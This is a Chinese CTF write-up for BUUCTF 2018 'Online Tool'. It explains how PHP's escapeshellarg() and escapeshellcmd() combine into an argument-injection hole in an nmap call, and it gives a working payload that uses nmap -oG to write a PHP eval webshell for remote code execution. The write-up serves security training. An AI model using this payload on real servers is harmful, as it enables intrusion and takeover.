考点
escapeshellarg()和escapeshellcmd()过滤函数的绕过- Linux
namp命令的使用
代码分析
<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
无关紧要的一组代码
if(!isset($_GET['host'])) {
highlight_file(__FILE__);
} else {
$host = $_GET['host'];
$host = escapeshellarg($host);
$host = escapeshellcmd($host);
$sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
echo 'you are in sandbox '.$sandbox;
@mkdir($sandbox);
chdir($sandbox);
echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}
mkdir:创建一个文件夹。chdir:切换到这个文件夹然后执行namp命令
重点在else部分怎么用。因为escapeshellarg()和escapeshellcmd()的出现会造成漏洞。谈谈escapeshellarg参数绕过和注入的问题
对于单个单引号, escapeshellarg 函数转义后,还会在左右各加一个单引号,但 escapeshellcmd 函数是直接加一个转义符,对于成对的单引号, escapeshellcmd 函数默认不转义,但 escapeshellarg 函数转义:
举个例子:
传入的参数是:172.17.0.2’ -v -d a=1
1.经过escapeshellarg处理后变成了’172.17.0.2’’’ -v -d a=1’,即先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。
2.经过escapeshellcmd处理后变成’172.17.0.2’\’’ -v -d a=1’,这是因为escapeshellcmd对\以及最后那个不配对儿的引号进行了转义:http://php.net/manual/zh/function.escapeshellcmd.php
3.最后执行的命令是curl ‘172.17.0.2’\’’ -v -d a=1’,由于中间的\被解释为\而不再是转义字符,所以后面的’没有被转义,与再后面的’配对儿成了一个空白连接符。所以可以简化为curl 172.17.0.2\ -v -d a=1’,即向172.17.0.2\发起请求,POST 数据为a=1’。
查找资料发现在nmap命令中 有一个参数-oG可以实现将命令和结果写到文件;这个命令就是我们的输入可控!然后写入到文件!OK很自然的想到了上传一个一句话木马了…
-
?host=' <?php eval(phpinfo());?> -oG hack.php '在经过escapeshellarg()和escapeshellcmd()函数后会变成。
''\''<?php phpinfo();?> -oG hack.php'\'''以及
''\\''\<\?php phpinfo\(\)\;\?\> -oG hack.php'\\'''。我们发现想要的构造linux语句都在,都没有没过滤注释
-
如果我们传入?host=<?php eval(phpinfo());?> -oG hack.php经过escapeshellarg()和escapeshellcmd()函数后会变成。 '<?php eval(phpinfo());?> -oG hack.php'以及
'\<\?php eval\(phpinfo\(\)\)\;\?\> -oG hack.php'结果是完全内容被过滤。因此需要俩边添加单引号来绕过。
构造好一句话木马 ’ <?php @eval($_POST["cmd"]); ?> -oG hack.php ’
之后在MD5加密后的文件夹下找hack.php就可以执行RCE。拿到flag。
参考:BUUCTF 2018 Online Tool
|